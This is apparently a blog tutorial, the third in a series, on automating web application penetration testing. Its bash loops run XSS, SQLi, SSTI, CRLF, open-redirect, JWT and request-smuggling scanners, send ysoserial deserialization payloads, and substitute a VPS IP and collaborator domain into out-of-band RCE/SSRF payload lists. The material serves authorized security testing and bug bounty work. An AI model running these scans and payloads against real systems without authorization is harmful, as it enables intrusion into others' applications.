Automation of the reconnaissance phase during Web Application Penetration Testing III

by Karol Mazurek


This article is a continuation of the previous one, available at this link, and it is the final article in the reconnaissance automation trilogy. After enumerating subdomains, selecting one of them, and digging further for endpoints and queries, it is time to look for bugs.

In this episode, you will learn about the various techniques and tools that help detect misconfigurations in the application being tested, how to use them, and how to automate the entire process.

The described research is based on the OWASP methodology and the methodology contained in the book “Hack Tricks” by Carlos Polop.

One thing to mention: I will not describe these vulnerabilities in this article; rather, I will focus on the automation process. If you are not familiar with the vulnerabilities listed below, click on the links to learn more about each of them and practice how to find and exploit them.

  1. Cross-Site Request Forgery (CSRF)
  2. Cryptographic issues in TLS/SSL servers
  3. Cross-Site Scripting (XSS):
    a) Reflected XSS
    b) DOM XSS
    c) Blind XSS
  4. URL rewriting via request header:
    a) X-Rewrite-Url
    b) X-Original-Url
  5. Out-of-band interaction (OOB):
    a) Blind Remote Code Execution (RCE)
    b) Blind Cross-Site Scripting (XSS)
    c) Blind SQL injection (SQLi)
    d) Blind Server Side Request Forgery (SSRF)
  6. Server Side Template Injection (SSTI)
  7. Java insecure deserialization
  8. Carriage Return Line Feed Injection (CRLF)
  9. Reflected Open Redirect (OR)
  10. Bypassing 403/401 endpoints
  11. WordPress flaws:
    a) Broken Authentication
    b) Sensitive Data Exposure
    c) Enumeration of Components with Known Vulnerabilities
    d) Scanning Internal Network
    e) Server-side Request Forgery (SSRF)
  12. HTTP request smuggling
  13. Hop-by-hop deletion
  14. Broken links enumeration
  15. SQL injection (SQLi)
  16. JSON Web Tokens flaws (JWT)
  17. Directory Traversal / Path Traversal
  18. Local File Inclusion / Remote File Inclusion (LFI / RFI)

Before starting work, launch a new project in Burp Suite and turn off interception, as shown in the screenshot below:

Source: own study

I assume that you already have a properly prepared directory with the results from the previous article. A correctly configured path with files is presented below:

Source: own study

In case you want to create the files for an ad hoc test, they should contain the following content:

  1. dirs.txt — this file contains URLs with directories and files, e.g.:
    http://subdomain.example.com/directory1/
    http://subdomain.example.com/directory1/file1
    http://subdomain.example.com/directory2/
  2. params.txt — this file contains URLs with queries, e.g.:
    http://subdomain.example.com/directory1/file1?query1=a&query2=b
    http://subdomain.example.com/directory1/file2?query3=x&query4=z

Additionally, you will need the IP address of a publicly available web server listening on port 80. If you do not have a virtual private server and do not want to pay for one, you can get a free 12-month AWS VPS here or spend a little money at OVHcloud.

Then you have to open port 80 on the firewall. Here is how to do it on an AWS EC2 instance, and there you can learn how to do it on OVHcloud. Once you have a VPS with port 80 open, start a simple HTTP web server by issuing the command below in your VPS terminal:

Source: own study
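
The original screenshot is not reproduced here. A minimal equivalent, assuming Python 3 is available on the VPS, is:

    # Serve HTTP on port 80 (root is needed for ports below 1024) and keep a
    # copy of the request log so out-of-band callbacks can be reviewed later.
    sudo python3 -m http.server 80 2>&1 | tee http.log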

The last step is to get the address of the collaborator server. To obtain this address, you can use Burp Suite or create your own private collaborator server.

In this article, I will use the publicly available collaborator provided with Burp Suite. Follow the steps below to get the address:

Source: own study

One more thing worth mentioning: all the commands shown below that handle the Cookie header will be used with that header. You can run these commands without a cookie, or declare it as follows:

Source: own study
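
The screenshot is not reproduced here; a simple way to declare the cookie once and reuse it (the cookie name and value below are placeholders) looks like this:

    # Store the session cookie in a variable and pass it to every command that needs it.
    cookie="SESSIONID=placeholder_value"
    curl -s -H "Cookie: $cookie" "http://subdomain.example.com/directory1/file1"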

Now that you have everything ready, it is time for the main topic, i.e. automating bug finding in web applications. First switch to the working directory and manually review the content of “params.txt” and “dirs.txt”. Delete the URLs that you are not interested in testing, save the changes and start the first tool, which crawls the main domain and checks for CSRF vulnerabilities. The results of XSRFProbe will be stored in the directory “csrf-$domain/”.

Tools used:

  • XSRFProbe

The screenshot below shows how you can automate this process using bash:

Source: own study
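
Since the screenshot is missing, here is a rough sketch of such an XSRFProbe run; the output flag and directory name follow the “csrf-$domain/” convention mentioned above and may differ from the original command (check xsrfprobe --help for your version), and $domain is assumed to hold the tested domain:

    # Crawl the main domain and test discovered endpoints for CSRF issues.
    xsrfprobe -u "https://$domain" -o "csrf-$domain"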

After XSRFProbe has finished, check for misconfigurations in TLS/SSL cryptography. In bug bounty programs these kinds of vulnerabilities will probably not be accepted, but you should check them anyway, as they create a serious security hole for man-in-the-middle (MITM) attacks. The output of the command will be stored in the “testssl.txt” file.

Tools used:

  • testssl.sh

The screenshot below shows how you can automate this process using bash:

Source: own study
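
A minimal sketch of this step (the path to testssl.sh is an assumption; the original command may use additional switches):

    # Full TLS/SSL scan of the target, with a plain-text copy kept for later review.
    "$HOME/tools/testssl.sh/testssl.sh" "https://$domain" | tee testssl.txt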

The next step will be time-consuming, but it may pay off the most in the entire process described. Yes, you are right: it will be fuzzing. Both the file with parameters, “params.txt”, and the file with directories and files, “dirs.txt”, will be fuzzed. First we will deal with the parameter values from “params.txt”. For each URL, we put the placeholder “FUZZ” in place of each parameter value. For this purpose we will use my program called crimson_paramjuggler.

Below is an example of a URL with two parameters before and after the conversion, to show what is going on:

Source: own study

After this transformation, a loop is created in which each of the new URLs is fuzzed with a wordlist called “bug”, which I constantly update and modify in order to optimize the fuzzing time and the number of bugs found. You can download it here. After downloading, save it as:

  • $HOME/tools/CRIMSON/words/bug

Tools used:

  • crimson_paramjuggler

The screenshot below shows how you can automate this process using bash:

Source: own study
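
The original screenshot is not reproduced here. As an illustration only, a Wfuzz loop like the one below fuzzes every templated URL with the “bug” wordlist; the input file name “temp_params.txt” (produced by crimson_paramjuggler) and the response filter are assumptions:

    # Each line of temp_params.txt holds a URL with FUZZ in place of a parameter value.
    while read -r url; do
        wfuzz -c -z file,"$HOME/tools/CRIMSON/words/bug" \
              -H "Cookie: $cookie" --hc 404 "$url" | tee -a bug_params.txt
    done < temp_params.txt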

The second part of the fuzzing will cover files and directories in “dirs.txt” list:

Source: own study
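
Again, only a sketch: the same wordlist is appended to every directory and file URL from “dirs.txt” (the exact fuzzer and filters in the original may differ):

    # Append the FUZZ keyword to each URL from dirs.txt and fuzz it with the "bug" wordlist.
    while read -r url; do
        wfuzz -c -z file,"$HOME/tools/CRIMSON/words/bug" \
              -H "Cookie: $cookie" --hc 404 "${url}FUZZ" | tee -a bug_dirs.txt
    done < dirs.txt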

After completing the fuzzing, merge “params.txt” and “dirs.txt” into one file, “all.txt”. Then perform the rest of the tests on it (in the meantime you can analyze the output of both fuzzing runs, “bug_params.txt” and “bug_dirs.txt”; look for anomalies in the response length and the status code).

Tools used:

The screenshot below shows how you can automate this process using bash:

Source: own study
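
A minimal way to do the merge and deduplication:

    # Combine both lists, remove duplicates and use all.txt for the remaining tests.
    sort -u params.txt dirs.txt > all.txt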

Check for the low-hanging fruit: reflected XSS and DOM-based XSS on all gathered URLs.

Tools used:

  • XSStrike
  • Dalfox

The screenshot below shows how you can automate this process using bash:

Source: own study
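
The screenshot is missing; a rough equivalent using XSStrike and Dalfox (the two XSS scanners referenced in the output list at the end of this article) could look like the following. The tool paths, flags and intermediate output names are assumptions:

    # XSStrike: test each gathered URL individually.
    while read -r url; do
        python3 "$HOME/tools/XSStrike/xsstrike.py" -u "$url" | tee -a xsstrike_raw.txt
    done < all.txt

    # Dalfox: scan the same list and store potential findings in dalfox.txt.
    dalfox file all.txt --cookie "$cookie" -o dalfox.txt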

Then check if the “X-Rewrite-Url” or “X-Original-Url” header is honored. For this purpose I have created a tool called crimson_rewriter. As a result you will get a list of all URL addresses that support the “X-Rewrite-Url” and “X-Original-Url” headers.

Tools used:

  • crimson_rewriter

The screenshot below shows how you can automate this process using bash:

Source: own study
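
crimson_rewriter’s exact invocation is not shown in the text; purely as an illustration of the underlying check (not the tool itself), a plain curl loop that flags URLs reacting to the headers might look like this:

    # Compare the status code of a normal request with requests carrying the
    # rewrite headers; a difference suggests the header is honored.
    while read -r url; do
        base=$(curl -s -o /dev/null -w "%{http_code}" -H "Cookie: $cookie" "$url")
        rew=$(curl -s -o /dev/null -w "%{http_code}" -H "Cookie: $cookie" -H "X-Rewrite-Url: /" "$url")
        orig=$(curl -s -o /dev/null -w "%{http_code}" -H "Cookie: $cookie" -H "X-Original-Url: /" "$url")
        if [ "$base" != "$rew" ] || [ "$base" != "$orig" ]; then
            echo "$url base=$base rewrite=$rew original=$orig" >> rewriter.txt
        fi
    done < all.txt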

The next step will be to test the out-of-band interactions of each parameter value in the “params.txt” list. In this step, we check several vulnerabilities using RCE, SQLi, blind XSS and SSRF payloads.

The wordlist can be downloaded here. After downloading save it as:

  • $HOME/tools/CRIMSON/words/exp/OOB

To use it, you can bring into play my next tool, called crimson_oobtester. Generally, the wordlist includes payload schemes with “vps_ip” and “domain_collab“ placeholders. Those placeholders will be replaced automatically with the given VPS IP and the collaborator’s domain address by crimson_oobtester, and the payloads will then be sent to the given server.

Tools used:

  • crimson_oobtester

The screenshot below shows how you can automate this process using bash:

Source: own study
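
crimson_oobtester handles the substitution and sending automatically; as a sketch of just the placeholder replacement it performs (file names and values below are examples):

    # Replace the wordlist placeholders with real values before the payloads are sent.
    vps_ip="203.0.113.10"                                # example VPS address
    collaborator_domain="xxxxxxxx.burpcollaborator.net"  # example collaborator address
    sed -e "s/vps_ip/$vps_ip/g" -e "s/domain_collab/$collaborator_domain/g" \
        "$HOME/tools/CRIMSON/words/exp/OOB" > oob_payloads.txt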

Use your virtual private server IP address in place of $vps_ip, the collaborator’s domain address in place of $collaborator_domain, and save the downloaded wordlist with payloads in the path given above.

crimson_oobtester logs all sent payloads with their identifiers and sending times. After the program has finished, check the logs of your web server and compare them with the “oob.txt“ file. Below is an example output of “oob.txt”:

Source: own study

Then run another scanner, which will look for DNS interactions by sending POST requests with an insecure Java deserialization gadget chain payload (URLDNS) in place of the parameter values from “params.txt”.

The program will not work without the “ysoserial.jar” file located in:

  • $HOME/tools/ysoserial/ysoserial.jar

Tools used:

  • ysoserial

The screenshot below shows how you can automate this process using bash:

Source: own study
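
The screenshot is not reproduced here; the core of this step can be illustrated with ysoserial and curl (the numeric prefix in the collaborator subdomain identifies the tested parameter, as described below; the target URL and parameter are examples):

    # Generate a URLDNS gadget chain that resolves a unique collaborator subdomain.
    java -jar "$HOME/tools/ysoserial/ysoserial.jar" URLDNS \
         "http://1.$collaborator_domain" > urldns_1.bin

    # Send it as a POST body in place of a parameter value from params.txt.
    curl -s -X POST -H "Cookie: $cookie" --data-binary @urldns_1.bin \
         "http://subdomain.example.com/directory1/file1"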

After the scan is complete, check DNS interactions on your collaborator server. Each ping will be marked with an identification number in the address of the collaborator’s domain to make it easier to find which exact parameter triggered the interaction and is potentially vulnerable.

Below you can see an example output of testing 2 URLs (the first one has two parameters, therefore it is tested twice):

Source: own study

Here you can see an example of an interaction with the collaborator. Note the number “2” in front of the domain name, signaling the interaction triggered by the payload:

Source: own study

Then test the injection of CRLF characters in the URL path.

Tools used:

  • CRLFuzz

The screenshot below shows how you can automate this process using bash:

Source: own study
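
A minimal sketch using CRLFuzz (flag names may differ between versions; check crlfuzz -h):

    # Test every gathered URL for CRLF injection; findings are written to CRLF.txt.
    crlfuzz -l all.txt -o CRLF.txt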

The next step will be to test for the open redirect vulnerability. For this purpose, we are going to use the old but gold Wfuzz to fuzz the URLs from “dirs.txt” and the parameter values from “temp_params.txt”, a file previously created by crimson_paramjuggler. The test will result in all URL addresses that have been redirected being stored in the “OR.txt” file.

Tools used:

  • Wfuzz

The screenshot below shows how you can automate this process using bash:

Source: own study
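
The screenshot is missing; a rough Wfuzz sketch is shown below. The open-redirect payload list path is a hypothetical placeholder, and only redirect status codes are kept in the output:

    # Fuzz each FUZZ placeholder with open-redirect payloads and keep redirect responses.
    while read -r url; do
        wfuzz -c -z file,"$HOME/tools/CRIMSON/words/open_redirect_payloads" \
              -H "Cookie: $cookie" --sc 301,302,303,307,308 "$url" | tee -a OR.txt
    done < temp_params.txt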

Next, test for Server-Side Template Injection using crimson_templator, which injects SSTI payloads into the parameter values from “params.txt” and checks whether the payload is evaluated by the server and reflected in the response.

Tools used:

  • crimson_templator

The screenshot below shows how you can automate this process using bash:

Source: own study
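
crimson_templator automates this; as an illustration of the underlying idea only (not the tool itself), a simple arithmetic payload can be injected and its evaluated result searched for in the response:

    # If {{7*7}} comes back as 49, the value is probably evaluated by a template engine.
    # temp_params.txt holds URLs with FUZZ in place of parameter values; the check is
    # noisy (any "49" in the response matches) and only meant to show the concept.
    payload='{{7*7}}'
    while read -r url; do
        if curl -s -H "Cookie: $cookie" "${url//FUZZ/$payload}" | grep -q '49'; then
            echo "$url" >> ssti.txt
        fi
    done < temp_params.txt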

Then, if you did the reconnaissance described in the second article, you should have a “status_dir.txt” file in which all found URL addresses are saved along with the status codes of the server’s responses. In this step, we try to bypass 403/401 restrictions with the help of the DirDar program and reach the directory despite them.

Tools used:

  • DirDar

The screenshot below shows how you can automate this process using bash:

Source: own study
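
A sketch of this step, assuming “status_dir.txt” stores one “URL status-code” pair per line (DirDar’s flags may differ between versions; check its help output):

    # Keep only the URLs that answered 401 or 403 and try to bypass them with DirDar.
    grep -E ' (401|403)$' status_dir.txt | awk '{print $1}' > forbidden.txt
    dirdar -l forbidden.txt | tee dirdar.txt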

If the website you are testing uses WordPress, you can use the scanners below to enumerate this CMS, check if there is an SSRF vulnerability, and also brute-force hidden plugins for further exploitation using a program for static analysis of the source code.

Tools used:

The screenshot below shows how you can automate this process using bash:

Source: own study
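
The article does not name the scanners in the text; WPScan is a common choice for this kind of enumeration, so the sketch below uses it as a stand-in (flags and the output path are assumptions, and it does not cover the SSRF check or plugin brute-forcing mentioned above):

    # Enumerate all plugins, themes and users; store the report in the wp/ directory.
    mkdir -p wp
    wpscan --url "https://$domain" -e ap,at,u \
           --plugins-detection aggressive -o wp/wpscan.txt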

In the next steps, vulnerabilities such as HTTP request smuggling, hop-by-hop deletion and SQL injection will be tested, and all broken links will be found.

Tools used:

  • Smuggler
  • sqlmap

The screenshot below shows how you can automate this process using bash:

Source: own study
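
Two of these checks can be sketched with well-known tools; the sqlmap flags below are standard, while the smuggler invocation (reading URLs from stdin) and its path are assumptions:

    # SQL injection: run sqlmap in unattended mode against every URL with parameters.
    sqlmap -m params.txt --batch --cookie="$cookie" --output-dir=Sqli

    # HTTP request smuggling: feed the gathered URLs to smuggler and keep the output.
    cat all.txt | python3 "$HOME/tools/smuggler/smuggler.py" | tee smuggler.txt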

The last test will cover the JWT token if it exists. First decode the token to see what is inside, then perform a playbook scan using the provided token directly against the application to hunt for common misconfigurations.

Tools used:

  • jwt_tool

The screenshot below shows how you can automate this process using bash:

Source: own study
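
A sketch using jwt_tool (the path, the $jwt_token variable, the cookie name “jwt” and the playbook mode flag are assumptions; adapt them to how the application transports the token):

    # Decode the token first to inspect its header and claims.
    python3 "$HOME/tools/jwt_tool/jwt_tool.py" "$jwt_token" | tee jwt.txt

    # Then run the playbook scan directly against the application with that token.
    python3 "$HOME/tools/jwt_tool/jwt_tool.py" -t "https://$domain/" \
            -rc "jwt=$jwt_token" -M pb | tee -a jwt.txt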

Finally, all potential reflected and DOM-based XSS findings will be opened in Firefox in order to confirm and manually test the vulnerabilities.

Tools used:

Source: own study
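
A simple loop is enough here (the input file name follows the “vuln_xss” output listed below):

    # Open every candidate URL in Firefox, one tab at a time, for manual verification.
    while read -r url; do
        firefox "$url" &
        sleep 2
    done < vuln_xss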

After the entire process described above, it is time to check the list of output files and hopefully find some bugs:

  1. bug_params.txt — output from parameter fuzzing.
  2. bug_dirs.txt — output from files and directories fuzzing.
  3. vuln_xss — filtered potentially vulnerable URLs from XSStrike.
  4. rewriter.txt — list of URL addresses that support rewriting headers.
  5. smuggler.txt — URLs potentially vulnerable to HTTP request smuggling.
  6. hop_by_hop.txt — output from the hop-by-hop deletion test.
  7. broken_links.txt — broken URL addresses.
  8. Sqli/ — directory with sqlmap output.
  9. oob.txt — a file used to identify interactions with the VPS and collaborator.
  10. CRLF.txt — output from CRLFuzz.
  11. OR.txt — list of URL addresses potentially vulnerable to open redirection.
  12. dalfox.txt — output from the Dalfox XSS scanner.
  13. ssti.txt — URLs potentially vulnerable to Server-Side Template Injection.
  14. wp/ — directory with WordPress scanner results.
  15. dirdar.txt — list of URL addresses for which 403/401 restrictions were bypassed.
  16. csrf-$domain/ — directory with CSRF scanner (XSRFProbe) output.
  17. jwt.txt — file with jwt_tool scanner results.

However, it is not over yet. In the previous article, all URLs in both “dirs.txt” and “params.txt” were proxied to Burp Suite. The tool itself has a lot of built-in automatic scanners, but it is worth adding so-called extensions to it.

There are a lot of them; the list of extensions that I recommend installing in Burp Suite to maximize the chances of automatically finding misconfigurations is presented at this link. There you will find not only automatic scanners, but also many tools that will support your manual work.

As a reminder, at the moment a human is irreplaceable and the tools can be wrong, so after completing the entire process, you should test the application manually according to the WSTG described here. The Autowasp extension will also be helpful.

The above process has been automated in one script called crimson_exploit.
This is one of the three modules that are part of the crimson tool, which I am constantly developing and sharing on GitHub.

After this whole process, you should have a lot of files with potential vulnerabilities to review. After their analysis and confirmation, proceed to manual testing and exploitation of the vulnerabilities found in order to check their real impact on the business.

This was my last article on web application reconnaissance automation.
If you’re reading this article from the future, a lot could have changed, so I recommend following my project “CRIMSON” on Github, as I try to keep everything up-to-date there.

References:

  1. https://github.com/Karmaz95/crimson
  2. https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
  3. https://book.hacktricks.xyz/pentesting/pentesting-web
  4. https://portswigger.net/web-security/

About the Author:

Karol Mazurek – Penetration Tester, Security Researcher and Bug Bounty Hunter.


The article was originally published at: https://karol-mazurek95.medium.com/automation-of-the-reconnaissance-phase-during-web-application-penetration-testing-iii-2823b16f38cc
